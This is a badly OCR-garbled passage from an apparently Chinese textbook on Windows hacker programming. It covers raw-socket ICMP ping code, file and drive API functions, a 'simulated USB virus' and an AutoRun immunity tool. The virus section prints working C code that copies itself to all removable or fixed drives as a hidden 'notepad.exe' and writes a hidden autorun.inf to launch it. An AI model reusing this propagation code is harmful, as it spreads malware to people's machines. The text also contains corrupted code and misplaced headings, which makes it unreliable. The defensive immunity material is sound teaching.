答 ， 当 类 型 码 取 值 为 8 时 ， 代 码 的 0 值 表 示 请 求 回 显 。Ping 命令 发 送 一 个 ICMP 数据 报时 ， 
类 型 码 为 8， 代码 为 0， 表示 向 对 方 主 机 进行 请 求 回 显 ; 当 收 到 对 方 的 ICMP 数据 报时 ， 类 型 
码 为 0， 代 码 为 0， 表 示 收 到 了 对 方 主 机 的 回 显 应答 。 简 单 来 说 ，Ping 命令 发 出 的 数据 中 ， 
类 型 是 8， 代码 是 0， 如 果 对 方 有 回应 ， 那 么 对 方 回 应 的 数据 中 ， 类 型 是 0， 代码 是 0。 
在 自己 实现 Ping 命令 时 ， 就 是 去 自己 构造 一 个 请 求 回 显 的 ICMP 数据 报 ， 然 后 进行 发 送 。 
ICMP 的 数据 结构 定义 如 下 : 
// ICME 协议 结构 体 定义 
struct icmp header 
| unsigned char icmp type; // 消息 类 型 
unsigned char icmp. code; % 人 Se 
unsigned short icmp, checksum; 
unsigned short icmp id; / / 局 半 扩 i 的 ID 号 ， 通 常设 置 为 进程 TD 
unsigned short icmp sequence  / 列 号 


unsigned long icmp timestamp; 区 六 
he 


提示 : ICMP 的 数据 结构 在 网 络 开 发 中 会 经 常用 到 ， 请 读者 将 其 保存 以 备 后 用 。 
明白 了 ICMP 协议 的 数据 结构 ， 现 在 用 抓 包 工具 (也 可 以 称 为 协议 分 析 工 具 ) Wireshark 
来 分 析 一 下 ICMP ha > - 2-18 所 示 。 





en Ontro 
人 3 CEche (ping) raquest) 
Code: 


Chac sos 0x455< [correcr] 

I de se BE): Se COx0200) 
identifier 癌 LE): 2 COx0002) 

Sequence Number CBE ): 15365 (COx0600) 
Sequence PH CE £):; 5《OxO006] 


3 Data Ee ytd 
a DE 
Length 


3 TNA pe ad 0 5 
0 00 40 o1 00 00 0a 0a le 0c c0 aa 


5 9 
10 36 6 We 
20 00 Fe 38 00 43 3 82 08 98 90 Rs 

040 


图 2-18 ICMP 数据 结构 分 析 
在 图 2-18 中 ， 标 识 1 的 部 分 是 对 协议 进行 过 滤 设 置 的 ， 在 该 部 分 输入 “ICMP” 可 以 让 
Wireshark 只 显示 ICMP 的 数据 记录 。 相 应 地 ， 可 以 输入 “TCP”“UDP”“HTTP” 等 协议 
进行 筛选 过 滤 。 标 识 2 的 部 分 用 于 显示 筛选 后 的 ICMP 记录 , 从 这 里 可 以 明显 看 出 源 耳 地 址 、 
目的 他 地 址 和 协议 的 类 型 。 标 识 3 的 部 分 用 于 显示 ICMP 数据 结构 的 值 和 附加 的 数据 内 容 。 
最 下 面 的 部 分 显示 了 数据 的 原始 的 二 进 制 数 据 ， 在 熟练 掌握 协议 后 ， 查 看 原始 的 二 进 制 数据 
也 并 不 是 不 可 能 


2.4.3 ”Ping 命令 的 实现 
有 了 前 面 的 基础 ， 就 可 以 构造 自己 的 ICMP 数据 报 来 构造 自己 的 Ping 命令 了 。 首 先 ， 定 
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义 两 个 常量 ， 还 有 计算 校 验 和 的 函数 ， 具 体 如 下 : 
struct Ecmp header 


{ 


unsigned char icmp type; /7 消息 类 型 

unsigned char icmp code; /AY 代码 

unsigned short icmp, checksum; // 校 验 和 

unsigned short icmp id; // 用 来 唯一 标识 此 请 求 的 TD 号 ， 通 常设 置 为 进程 ID 
unsigned short icmp sequence // 序列 号 


unsigned long icmp timestamp; // 时 间 戳 
过 


#define ICMP HEADER SIZE sizeof (icmp header) 
#define ICMP ECHO REQUEST 0x08 
#define ICMP ECHO REPLY 0x00 


// 计算 校 验 和 
unsigned short chsum(struct icmp, header *picmp, int len) 
{ 

long sum = 05 

unsigned short *pusicmp = (unsigned short *)picmp; 


while ( len >1 ) 
{ 
sum += * (pusicmp++)? 
if ( sum & 0x80000000 ) 
{ 
sum = (Sum & Oxffff) + (Sam >> 16) 
} 
len -= 27 
} 


i (Bn) 
{ 


} 


sum += (unsigned short)*(unsigned char *)pusicmp; 


Wailie ( suml>> 16 ) 
{ 

sum = (Sum & Oxffff) + (sum >> 16)? 
} 


return (unsigned short)~sum; 
} 


ICMP 的 校 验 值 是 一 个 16 位 的 无 符号 整 型 ， 它 会 将 ICMP 协议 头 不 的 数据 进行 累加 ， 当 
累加 有 溢出 的 话 ， 会 将 溢出 的 部 分 也 进行 累加 。 具 体 计算 校 验 和 的 算法 就 不 过 多 介绍 了 ， 如 
果 对 校 验 和 计算 的 代码 不 了 解 ， 可 以 进行 单 步调 试 来 进行 分 析 。 再 来 看 一 下 对 于 ICMP 结构 
体 的 填充 ， 有 具体 代码 如 下 : 


BOOL MyPing (char *szDestIp) 

{ 
BOOL bRet = -TRUE; 
WSADATA wsaData; 
int nTimeOut = 1000; 
char szBuff[ICMP HEADER. SIZE + 32] = { 0 1? 
icmp header *pIcmp = (icmp header *)szBuff; 
char icmp data[32] = { 0 }; 


WSAStartup (MAKEWORD (2, 2), &wsaData); 
// 创建 原始 套 接 字 
SOCKET S = socket (PF INET, SOCK RAW, IPPROTO ICMP); 


// 设置 接收 超时 


setsockopt (s, SOL _ SOCKET, ‘SO. RCVTIMEO, (char const*)&nTimeOut, sizeof (nTimeQut)): 








2.5 总 结 








// 设置 目的 地 址 


sockaddr in dest addr; 


dest addr.sin family = 及 PR INET; i 第 
dest addr.sin addr.S un.S addr = inet addr (szDestIp)? 学 
dest addr.sin port = htons(0) 7 音 
7/ 构造 ICMB 封包 

pIcmp->icmp type = ICMP ECHO REQUEST; 黑 
plcmp->icmp_code = 0; 客 
PEIcmp=>icmp_id = (USHORT); :GetCurrentProcessId(); 网 
plicmp->iemp sequence = 0; 络 
plcmp->icmp timestamp = 0; 编 
plcmp->icmp ohecksum = 0; 程 
// 拷贝 数据 

// 这 里 的 数据 可 以 是 任意 的 Fen 


// 这 里 使 用 abc 是 为 了 和 系统 提供 的 看 起 来 一 样 
memcpy( (szBuff + ICMP HEADER SIZE), "abcdefghijklmnopqrstuvwabcdefghi"”, 32); 


// 计算 校 验 和 


plcmp->icmp_checkstum = chsum((struct icmp header *)szBauff, sizeof (szBuff£)); 


sockaddr in from addr; 

char szRecvBuff[1024]; 

int nLen = sizeof (from addr); 

sendto(s, szBuff, sizeof (szBuff), 0, (SOCKADDR *)&dest addr, sizeof ‘(SOCKADDR)); 
recvfrom(ls, szRecvBuff, MAXBYTE, 0, (SOCKADDR *)&from addr, g&nLen); 


// 判断 接收 到 的 是 否 是 自己 请 求 的 地 址 

if ( lstrcomp(inet ntoa(from addr.sin addr), szDestIp) ) 

{ 
bRet = FALSE:; 

} 

else 

{ 
struct icmp header *pIcmpl = (icmp header *) (szRecvBuff + 20)»; 
printf("%s\r\n", inet ntoal(lfrom addr.sin addr)); 

} 


return bRet; 


} 
这 就 是 Ping 命令 的 全 部 代码 了 。 自 己 写 一 个 函数 调用 它 进行 测试 。 


/py 注 : 在 Windows XP 以 上 的 操作 系统 中 运行 时 ,比如 Windows 8 系统 ， 程 序 可 能 会 无 法 正常 的 运行 ， 这 是 
因为 操作 系统 权限 所 导致 的 。 在 被 编译 好 的 程序 上 单 击 右键 ， 在 弹出 的 菜单 上 选择 “以 管理 员 身份 运行 "， 
这 样 程序 就 可 以 正常 的 执行 了 。 


2.5 总 结 


本 章 介 绍 了 对 于 网 络 开发 的 基础 知识 ， 重 点 介绍 了 关于 Winsock 的 几 种 开发 模式 ， 包 括 
用 SOCK_STREAM 开发 TCP 的 例子 、 用 SOCK_DGRAM 开发 UDP 的 例子 和 使 用 SOCK RAW 
开发 ICMP 的 例子 。 此 外 ， 本 章 还 结合 Windows 的 消息 机 制 介绍 了 Winsock 的 异步 开发 模式 ， 
使 得 用 户 可 以 方便 地 开发 基于 窗口 的 网 络 应 用 程序 。 
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刚 开 始 接触 编程 的 “小 黑 ” 可 能 会 觉得 Windows API 是 一 个 很 神奇 、 很 万 能 的 工具 ， 尤 
其 是 通过 Visual Basic 或 E 语言 入 门 的 “小 黑 ”。Windows API 是 Windows 下 开发 应 用 程序 的 
基础 知识 ， 不 过 基础 并 不 代表 简单 ， 能 掌握 好 Windows API 来 开发 程序 也 是 非常 不 容易 的 。 

在 本 章 中 ， 读 者 将 学 到 较为 常见 且 常 用 的 Windows API 函数 ， 主 要 包括 进程 、 线 程 、 文 
件 、 注 册 表 、 服 务 等 相关 的 API 函数 。 除 此 之 外 ， 还 会 涉及 MFC 相关 的 知识 ， 但 是 MFC 非 
本 书 重点 ， 因 此 对 于 MFC 不 理解 的 部 分 需要 自行 参考 。 本 章 对 于 所 涉及 的 相关 理论 知识 介 
绍 较 少 ， 重 点 主要 放 在 对 Windows API 函数 的 使 用 上 。 


3.1 API 酚 数 、 病 毒 和 对 病毒 的 免疫 


在 Windows 下 ， 文 件 有 很 多 种 ， 比 如 图 片 文件 、 视 频 文件 、 音 频 文 件 …… 这 些 文件 都 属 
于 保存 在 磁盘 上 的 存储 格式 不 相同 的 文件 。 除 了 常见 的 磁盘 文件 格式 外 ， 管 道 、 邮 槽 ， 甚 至 
是 设备 对 象 , 在 Windows 下 也 都 被 当 作文 件 来 对 待 。 这 样 在 编程 的 过 程 中 , 操作 管道 、 邮 槽 、 
设备 对 象 就 如 同 操作 文件 一 样 。 


3.1.1 文件 相关 操作 API 函数 


1. 文件 的 打开 与 关闭 

要 对 文件 进行 操作 ， 首 先 把 要 操作 的 文件 打开 ， 文 件 打开 成 功 后 会 返回 一 个 可 以 用 于 操 
作文 件 的 句柄 ， 通 过 这 个 句柄 就 可 以 对 文件 进行 读 写 操作 了 。 

打开 文件 的 API 函数 定义 如 下 : 


HANDLE CreateFilel( 
LPCTSTR lpFileName, 
DWORD dwDesiredAccess, 
DWORD dwShareMode, 
LPSECURITY ATTRIBUTES lpSecurityAttriButes, 
DWORD dwCreationDisposition, 
DWORD dwFlagsAndAttributes, 
HANDLE hTemplateFile 


MiG 

参数 说 明 如 下 : 

lpFileName: 欲 打 开 或 创建 的 文件 名 ， 这 里 也 可 以 不 是 文件 名 ， 可 以 是 设备 对 象 之 类 的 
被 视 为 文件 的 相关 对 象 。 





中 
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dwDesiredAccess: 对 文件 的 访问 模式 ， 它 指定 了 要 对 打开 的 对 象 进行 何 种 操作 。 通 常 是 
GENERIC READ 和 GENERIC WRITE， 分别 表示 只 读 模 式 和 只 写 模式 ;还 可 以 通过 按 位 或 
运算 符 同时 指定 两 种 模式 ， 如 GENERIC _ READ | GENERIC WRITE。 

dwShareMode: 打开 文件 的 共享 模式 ， 表 示 文 件 被 打开 后 是 否 允 许 其 他 进程 进行 操作 ， 
如 果 可 以 进行 操作 ， 可 以 指定 其 操作 的 模式 。 

lpSecurityAttributes: 该 参数 表示 安全 属性 ， 通 过 这 个 参数 可 以 指定 返回 的 文件 句柄 是 否 
可 以 被 子 进程 继承 ， 如 果 参 数 设置 为 NULL， 表 明 无 法 被 继承 ， 和 否则 需要 将 参数 指向 一 
SECURITY_ATTRIBUTES 的 结构 体 。 该 参数 通常 为 NULL。 

dwCreationDisposition: 在 创建 或 打开 的 文件 存在 或 不 存在 时 该 函数 的 处 理 方式 。 

dwFlagsAndAttributes: 该 参数 用 来 指定 新 建文 件 的 属性 和 对 文件 操作 的 方式 。 

hTemplateFile: 文件 模板 句柄 ， 系 统 会 复制 该 文件 模板 的 所 有 属性 到 当前 创建 的 文件 中 。 

该 函数 若 执行 成 功 ， 则 返回 一 个 文件 句柄 ; 如 果 执 行 失 败 ， 则 返回 INVALID HANDLE 
VALUE。 有 具体 失败 的 原因 可 以 通过 调用 GetLastError() 函 数 来 得 到 。 

文件 的 打开 操作 调用 的 是 CreateFile() 函 数 ， 该 函数 名 不 像 其 名 字 那 样 只 能 用 于 创建 文件 。 
CreateFile() 函 数 既 可 以 打开 文件 ， 也 可 以 创建 文件 。 在 Windows 下 有 一 个 OpenFile() 函 数 用 
来 打开 文件 ， 不 过 它 是 Win16 的 产物 ， 在 Win32 下 必须 使 用 CreateFile() 来 打开 文件 。 

CreateFile() 的 参数 很 多 ， 不 过 用 习惯 后 会 发 现 常用 的 参数 都 很 容易 记 住 ， 甚 至 有 些 参 数 
常用 的 就 是 那么 一 两 个 。 在 对 文件 操作 完成 后 ， 需 要 对 打开 文件 的 句柄 进行 关闭 以 释放 资源 。 
关闭 对 象 句柄 的 函数 非常 简单 ， 而 且 使 用 也 非常 广泛 。 该 函数 的 定义 如 下 : 

BOOL CloseHanale! 

HANDLE hObject // handle to object 

该 函数 的 参数 只 有 一 个 ， 这 个 参数 就 是 调用 CreateFile() 函 数 时 的 返回 值 ， 也 就 是 文件 句 
柄 。 该 函数 并 不 仅仅 能 够 关闭 文件 句柄 ， 事 件 句 柄 、 进 程 句柄 、 线 程 句柄 等 一 系列 对 象 句 柄 
都 可 以 用 该 函数 进行 关闭 。 

2. 文件 的 操作 

文件 的 操作 有 4 种， 分别 是 “ 增 、 删 、 改 、 查 ”。 接 触 过 数据 库 的 读者 一 定 感觉 这 些 操作 
都 是 针对 数据 库 的 , 怎么 对 文件 的 操作 也 是 这 4 种 呢 ?” 其 实 , 不 单单 是 对 文件 的 操作 存在 增 、 

删 、 改 、 查 ， 对 注册 表 、 系 统 服务 、 进 程 等 的 操作 也 都 存在 增 、 删 、 改 、 查 。 只 不 过 相对 应 
的 有 不 同 的 Windows API 函数 ， 而 不 是 使 用 数据 库 的 SQL 语句 而 已 。 

用 文件 的 操作 进行 举例 说 明 。 文 件 的 “ 增 ” 操 作 可 以 理解 为 创建 文件 ， 文 件 的 “ 删 ” 操 
作 可 以 理解 为 删除 文件 ， 文 件 的 “ 改 ” 操 作 可 以 理解 为 对 文件 的 写 操 作 ， 文 件 的 “ 查 ” 操 作 
可 以 理解 为 对 文件 的 “ 读 ” 操 作 。 

对 于 文件 的 读 写 操作 可 以 从 狭义 和 广义 上 进行 认识 ， 狭 义 的 “ 读 文件 ”就 是 读 取 已 打开 
文件 的 内 容 或 数据 ， 而 广义 的 “ 读 文件 ” 则 可 以 是 获取 文件 的 大 小 、 创 建 时 间 和 修改 时 间 等 ， 
因为 文件 的 大 小 、 创 建 时 间 、 修 改 时 间 也 属于 文件 的 属性 ， 只 是 这 些 属性 不 保存 在 本 身 的 文 
件 中 。 写 操作 也 是 同样 的 道理 。 

下 面 将 介绍 常用 的 文件 的 删除 操作 、 读 写 操作 所 涉及 的 API 函数 ， 具 体 的 更 多 涉及 文件 
操作 的 函数 无 法 一 一 介绍 ， 靠 读者 自行 积累 总 结 。 
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删除 文件 的 API 函数 定义 如 下 : 
BOOL Déletepile( 

LPCTSTR lpFileName 
Me 
该 函数 的 参数 只 有 一 个 ，lpFileName 表示 要 删除 的 文件 的 文件 名 。 大 部 分 的 文件 操作 函 
数 都 是 通过 CreateFile() 函 数 返 回 的 文件 句柄 进行 操作 ， 而 DeleteFile() 函 数 使 用 的 文件 名 进行 
操作 的 ， 如 果 文 件 被 打开 以 后 ， 又 怎么 能 删除 呢 ? 

读 取 文件 内 容 的 函数 如 下 : 
BOOL ReadFile( 

HANDLE hrilie, 
EPRVOTD, LBBBTfer, 
DWORD nNumberOfBytesToRead, 
LPDWORD lpNumberOfBytesRead, 

LPOVERLAPPED lpOverlapped 
Ds 
参数 说 明 如 下 。 
hFile: 文件 句柄 ， 通 常 是 CreateFile(O) 函 数 返 回 的 句柄 。 
lpBuffer: 指向 一 个 缓冲 区 ， 函 数 会 将 从 文件 中 读 出 的 数据 保存 在 该 缓冲 区 中 。 
nNumberOfBytesToRead: 要 求 读 入 的 字 节 数 ， 通 常情 况 下 是 缓冲 区 的 大 小 。 
lpNumberOfBytesRead: 指向 一 个 DWORD 类 型 的 变量 ， 用 于 返回 实际 读 入 的 字 节 数 。 
lpOverlapped: 一 般 设 置 为 NULL。 
写 入 文件 内 容 的 函数 如 下 : 
BOOL Writepile'l 

HANDLE hrile, 

LPOVOLD LPBUETer, 

DWORD nNumberOfBytesToWrite, 


LPDWORD lpNumberOfBytesWritten, 
LPOVERLAPPED lpOverlapped 

















be 

WriteFile0) 函 数 的 参数 和 ReadFile() 函 数 的 参数 意义 基本 相同 ， 所 不 同 的 是 第 2 个 参数 。 
第 2 个 参数 仍然 指向 一 个 缓冲 区 ，WriteFile() 函 数 会 将 该 缓冲 区 的 内 容 进行 写 入 。 当 用 
WriteFile() 函 数 写 文件 时 ， 写 入 的 数据 通常 被 Windows 暂时 保存 在 内 部 的 高 速 缓 存 中 ， 操 作 
系统 会 定期 进行 盘 写 入 ， 从 而 避免 频繁 进行 TO 操作 影响 执行 效率 。 为 了 保证 数据 即时 写 入 
可 以 使 用 FlushFileBuffers() 函 数 ， 该 函数 的 定义 如 下 : 


BOOL FlushrileButfers!( 
HANDLE hrile 








) 
该 函数 会 将 指定 文件 句柄 的 缓冲 区 进行 清空 ， 使 得 Windows 将 缓冲 区 中 的 文件 写 入 磁 
盘 。 该 函数 只 有 一 个 参数 ， 即 文件 句柄 。 该 文件 句柄 与 ReadFile0 和 WriteFile() 所 使 用 的 文件 
句柄 相同 。 

在 进行 文件 读 写 时 ， 往 往 并 不 是 由 前 往 后 顺序 读 写 ， 通 常 是 根据 需要 读 写 文件 的 某 个 部 
分 ， 这 就 需要 对 文件 指针 进行 移动 ， 从 而 正确 对 文件 进行 读 写 操作 。 移 动 文件 指针 的 函数 定 
义 如 下 : 

DWORD SetFilePointer!l 

HANDLE hrile, 


LONG lDistanceToMove, 
PLONG lpDistanceToMoveHigh, 

















DWORD dwMoveMethod 
);? 





中 





3.1 API 函数 、 病 毒 和 对 病毒 的 免疫 





该 函数 的 参数 说 明 如 下 。 

hFile: 进行 文件 操作 时 的 文件 句柄 ， 如 同 ReadFile0 和 WriteFile()。 

IDistanceToMove: 指定 要 移动 文件 指针 的 距离 。 

lpDistanceToMoveHigh: 一 个 指向 LONG 型 的 指针 , 移动 距离 的 高 32 位 , 一般 为 NULL。 

dwMoveMethod: 指定 移动 的 起 始 位 置 。 可 以 从 文件 开始 位 置 进行 移动 (FILE_ BEGIN)， 可 
以 从 当前 文件 位 置 开 始 移动 (FILE_CURRENT)， 也 可 以 从 文件 的 末尾 开始 移动 (FILE_ END )。 

3. 驱动 器 及 目录 相关 操作 

前 面 介 绍 了 文件 相关 的 操作 。 本 节 介 绍 目录 相关 的 操作 ， 主 要 介绍 4 个 相关 函数 ， 分 别 是 获 
取 本 地 所 有 尿 辑 驱动 器 、 获 取 驱 动 器 类 型 、 创 建 目录 和 移 除 目录 。 下 面 介 绍 这 4 个 函数 的 定义 。 

获取 本 地 所 有 逻辑 驱动 器 函数 的 定义 如 下 : 


DWORD GetLogicalDriveStrings'( 
DWORD nBufferLength, 
LPTSTR LpBUEfer 

); 


该 函数 的 参数 说 明 如 下 。 

nBufferLength: 表示 lpBuffer 的 长 度 。 

lpBuffer: 表示 接收 本 地 逻辑 驱动 器 名 的 缓冲 区 。 

该 函数 以 字符 串 的 形式 返回 本 地 所 有 可 用 的 驱动 器 名 保存 在 lpBuffer 中 。 返 回 字 符 串 的 
撒 式 如 GN 0 DY “0 

获取 驱动 器 类 型 函数 的 定义 如 下 : 


UINT GetDriveTypel 
Ue lpRootPatnName 


该 丽 数 只 4 有 一 个 参数 IpRootPathName， 要 获取 退 辑 驱动 器 类 型 的 驱动 器 名 ， 如 “C: \”。 


函数 返回 值 取 以 下 值 之 一 。 
DRIVE UNKNOWN: 无 法 识 齐 册 天 
DRIVE_NO_ROOT_DIR: ”无 效 的 驱动 器 路 径 
DRIVE REMOVEABLE: 可 移动 驱动 器 ， 如 1 U 移动 硬盘 等 ; 


DRIVE, FIXED: 人 
DRIVE REMOTE: 网 络 驱 动 器 
DRIVE_CDROM: 光盘 驱动 器 
DRIVE RAMDISK: 虚拟 驱动 器 。 
创建 目录 的 函数 定义 如 下 : 


BOOL CreateDirectoryl( 
LPECTSTR lpPathName, 
EY _ATTRIBUTES lpSecurityAttributes 


该 函 数 的 参数 说 明 如 下 。 

lpPathName: 创建 目录 的 目录 名 称 。 
lpSecurityAttributes: 安全 属性 ， 一 般 设 置 为 NULL。 
移 除 目录 的 函数 定义 如 下 : 

BOOL RemoveDirectory! 


LPCTSTR lpPathName 
0 


该 函数 的 参数 指定 要 移 除 的 目录 的 目录 名 。 
以 上 是 关于 驱动 器 和 目录 的 几 个 常用 的 API 函数 ， 下 一 小 节 会 使 用 前 面 所 学 的 API 函数 
来 完成 一 个 简单 说 实例 。 





~ 
Wy 
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3.1.2 模拟 U 盘 病 毒 


第 
3 
将 1. U 盘 病 毒 的 原理 剖析 
黑 U 盘 病 毒 的 原理 主要 依赖 于 AutoRun.inf 文件 。AutoRun.inf 文件 最 早 见 于 光盘 中 ， 它 的 
客 | 作用 是 在 载 入 光盘 (或 双击 具有 AutoRun inf 文件 光盘 的 驱动 器 盘 符 ) 时 自动 运行 指定 的 某 
个 文件 。 由 于 它 特 有 的 功能 和 性 质 ， 从 2006 年 左右 开始 ，AutoRun.inf 文件 被 利用 在 U 盘 和 
避 硬盘 之 间 传 播 木马 或 病毒 程序 。 
洛 /py 注 : AutoRun.inf 类 似 于 .ini 文件 ， 其 差别 在 于 AutoRun_inf 的 键 名 是 系统 国定 的 。 关 于 AutoRun.inf 文件 的 
编 相关 内 容 不 做 相应 的 介绍 ， 请 读者 自行 查阅 相关 的 资料 。 
be 这 里 模拟 U 盘 病 毒 的 AutoRun.inf 文件 内 容 如 下 ， 
Oe 
RE shell\open= 打 开 (&0) 


shell\open\Command=notepad.exe 
shell\explore= 资 源 管 理 器 (&X) 
shell\explore\Command="notepad.exe" 
shellexecute=notepad.exe 
shell\Auto\Command=notepad.exe 


2. 简单 模拟 代码 实现 

模拟 U 盘 病 毒 只 实现 一 个 最 简单 的 功能 ， 就 是 在 移动 磁盘 (DRIVE REMOVABLE 类 型 
的 分 区 ) 或 本 地 磁盘 (DRIVE_FIXED 类 型 的 分 区 ) 上 创建 AutoRun.inf 文件 ， 还 要 将 自身 复 
制 到 相应 盘 符 的 根 目录 下 。 这 就 是 本 程序 实现 的 基本 功能 。 

具体 代码 如 下 : 


#include <Windows.h> 


char szAutoRun[] = [RatoRan] \ 
\r\nopen=notepad.exe \ 
\r\nshell\\open= 打 开 (&0) 入 
\r\nshell\\open\\Command=notepad.exe \ 
\r\nshell\\explore= 资 源 管理 器 (&X) NA 
\r\nshell\\explore\\Command=notepad,.exe \ 
\r\nshellexecute=notepad,exe \ 
\r\nshell\\Auto\\Command=notepad.exe"; 


void infect (char *pszFile, UINT uDriveType) 
{ 

char szDriveString[MAXBYTE] = { 0 }7 

DWORD dwRet = 0» 

DWORD iNum = 0; 

char szRootldd = {Qu }s 

UINT uType = 0» 

char szTarget[MAX PATH] = {0 1}; 


dwRet = GetLogicalDrivestrings (MAXBYTE, szDriveString); 
while ( iNum < dwRet ) 
{ 

strncpy (szRoot, &szDriveString[iNum], 3); 


uType = GetDriveType (szRoot); 


if ( uType == uDriveType ) 
{ 











// 复制 文件 

lstrecpy (szTarget, szRoot); 

lstrcat (szTarget, "notepad.exe")y 
CopyFile (pszFiile, szTarget, FALSE); 


// 设置 notepad.exe 文件 为 隐藏 属性 


SetFileAttributes(szTarget, FILE ATTRIBUTE HIDDEN); 


// 建立 AutoRun.inf 文件 

lstropy (szTarget, SzZRoot); 

lstroat (szTarget; "autorun,inf")y 

HANDLE hrile = CreateFile (szTarget, 
GENERIC WRITE, 
0，NULE7 
CREATE ALWAYS, 
FILE ATTRIBUTE NORMAL, 
NULL); 

DWORD dwWritten = 0; 


WriteFile(hFile, szAutoRun, lstrlen (szAutoRun), 


&dwWritten: NULL); 
CloseHandle (hrile); 


// 设置 AutoRun.inf 文件 为 隐藏 属性 


SetFileAttributes (szTarget, FILE ATTRIBUTE HIDDEN); 


} 

iNum += 47 
} 
int main() 


{ 
7/ 自身 所 在 地 位 置 
char szFileName[MAX PATH] = { 0 }7 
// 保存 当前 文件 所 在 地 盘 符 
char szRoot[4] = (0 }» 
// 保存 磁盘 类 型 
UINT uType = 0; 


// 获取 当前 所 在 完整 路 径 及 文件 各 
GetModuleFileName (NULL, szFileName, MAX PATH) 7 
// 获取 所 在 盘 符 


strncpy (szRoot, szFileName, 3); 


uType: = GetDriveType (szRoot); 


Switceh ( UType ) 
{ 
Case DRIVE FIXED: 


// 如 果 是 在 硬盘 上 就 检测 一 遍 是 否 有 移动 磁盘 
infect (szFileName, DRIVE REMOVABLE); 
breaks 
} 
case DRIVE REMOVABLE: 


// 如 果 在 移动 磁盘 上 ， 则 将 自己 复制 到 移动 磁盘 上 
infect (szFileName, DRIVE_FIXED); 
break; 


} 


return 07 


} 
代码 中 的 思路 比较 明确 , 实现 也 比较 简单 。 需 要 说 明 的 是 , 如 果 U 盘 病 毒 在 本 地 磁盘 上 ， 
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就 将 检索 所 有 的 移动 磁盘 ， 并 建立 AutoRun.inf 文件 和 复制 自身 到 移动 磁盘 ， 并 命名 为 
notepad.exe; 如 果 U 盘 病 毒 在 移动 磁盘 上 ， 就 检索 所 有 的 本 地 磁盘 ， 并 建立 AutoRun.inf 文 
件 和 复制 自身 到 移动 磁盘 ， 并 命名 为 notepad.exe。 


spy 注 : 目前 安装 的 系统 ( 指 的 是 Ghost 版 的 系统 ， 不 是 原版 的 系统 ) 都 经 过 了 一 些 设置 ， 可 能 无 法 通过 
AutoRun.inf 自动 运行 ， 从 而 导致 无 法 执行 模拟 程序 。 


3.1.3 免疫 AutoRun 病毒 工具 的 编写 


1. AutoRun 免疫 的 原理 

前 面 介绍 了 基于 AutoRun.inf 进行 传播 的 模拟 病毒 ， 现 在 来 介绍 如 何 对 该 种 病毒 进行 免 
疫 ， 同 样 也 是 通过 前 面 学 习 的 文件 相关 的 知识 来 进行 。 免 疫 AutoRun 病毒 的 原理 是 建立 一 个 
无 法 被 删除 的 AutoRun.inf 文件 夹 (并 不 是 真正 的 无 法 删除 )， 以 防止 病毒 生成 用 来 运行 病毒 
的 AutoRun.inf 文件 。 这 就 是 它 的 免疫 原理 。 网 上 提供 的 免疫 程序 就 是 使 用 这 个 原理 ， 至 少 
作者 见 到 的 免疫 程序 都 是 用 这 种 原理 。 

2. 手工 演示 建立 无 法 删除 的 文件 夹 

在 “开始 ”菜单 的 “运行 ”中 输入 “cmd” 打 开 命 令 行 工具 ， 开 始 手工 演示 。 命 令 行 下 
的 命令 步骤 如 下 。 

OO 在 命令 行 下 输入 cd \， 注 意 在 cd 和 \ 之 间 是 有 一 个 空格 的 ， 这 步 将 命令 提示 符 切换 到 
C 枪 的 根 目 录 下 。 

@ 在 命令 行 下 输入 mkdir autorun.inf，mkdir 使 用 建立 目录 的 命令 ， 这 步 是 在 C 盘 根 目 
录 下 建立 了 一 个 名 为 autorun.inf 的 文件 夹 。 

@ 在 命令 行 下 输入 cd autorun.inf， 将 命令 提示 符 切 换 到 C 盘 下 的 autorun.inf 文件 
区 FE 

@ 在 命令 行 下 输入 mkdir anti..\， 这 步 是 在 autorun.inf 文件 夹 下 建立 一 个 名 为 anti...\ 的 
文件 光 。 

经 过 以 上 步骤 就 建立 了 一 个 无 法 删除 的 autorun.inf 文件 夹 ， 并 且 也 无 法 建立 与 之 同名 的 
文件 了 ， 下 面 逐步 进行 测试 。 

Q@ 打开 C 盘 ， 进 入 autorun.inf 文件 夹 ， 然 后 选中 它 进行 删 
除 , 会 出 现 如 图 3-1 所 示 的 错误 提示 对 话 框 , 表示 删除 操作 失败 。 

@) 进入 autorun.inf 文件 来， 找到 anti.. 文 件 夹 进行 删除 ， 会 
出 现 与 图 3-1 相同 的 提示 。 双 击 anti.. 文 件 夹 ， 会 出 现 如 图 3-2 所 图 3-1 无 法 读 取 源 文件 或 磁盘 
示 的 提示 对 话 框 ， 表 示 无 法 定位 该 文件 来， 说 明 该 文件 夹 无 法 删除 ， 也 无 法 进入 。 








图 3-2 无 法 打开 anti.. 文 件 夹 
@ 回 到 C 盘 的 根 目录 ， 建 立 一 个 .inf 文件 ， 名 为 autorun.inf， 提 示 如 图 3-3 所 示 的 对 话 





中 
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框 ， 表 明 无 法 建立 与 autorun.inf 文件 夹 同 名 的 文件 。 


重合 名 文件 或 文 性 严 时 出 钳 





图 3-3 重 命 名 文件 或 文件 夹 时 出 错 


Ey 注 : 用 心 的 读者 会 发 现 ， 在 建立 文件 夹 时 建立 的 是 anti..\ 这 样 的 文件 夹 ， 而 在 资源 管理 器 中 发 现 文件 夹 的 名 
称 变 成 了 anti..。 这 是 由 于 .. 和 \ 在 文件 系统 中 有 特殊 的 作用 。 具 体 原因 与 本 书 内 容 无 关 ， 在 此 不 做 过 多 的 介绍 。 


它 的 删除 方法 也 比较 简单 ， 使 用 “rd anti...\” 命 令 即 可 删除 该 文件 夹 。 

3. AutoRun 病毒 免疫 程序 的 实现 

前 面 的 内 容 已 经 掌握 了 手动 进行 免疫 AutoRun.inf 的 方法 ， 对 于 程序 的 实现 只 是 将 手动 
免疫 变 成 程序 化 的 自动 免疫 。 有 了 编程 的 基础 ， 有 了 开发 所 需 的 原理 ， 那 么 把 手工 免疫 变 成 
程序 免疫 就 是 水 到 渠 成 的 事 了 。 先 来 看 一 下 界面 ， 界 面 非 常 简陋 ， 如 图 3-4 所 示 。 


Combo Box 控 件 

控件 ID: 

IDC COMBO DRIVE 
控件 变量 : 


CComboBox m CbDrive 





控件 ID: 控件 ID: IDC_BTN_CANCEL 
IDC_BTN_IMMUNITY 


图 3-4 AutoRun 免疫 工具 界面 


整个 界面 中 有 3 个 控件 。IDC_COMBO _DRIVE 控件 需要 进行 初始 化 工作 ， 用 于 显示 驱 
动 器 的 分 区 列表 。 初 始 化 IDC_COMBO _DRIVE 的 代码 如 下 : 


void CImmanityUDlg:3InitCom5cDrzivye() 

{ 
chat szDriveStr [MAXBYTE] = { 0 1}7 
char *pTmp = NULL; 


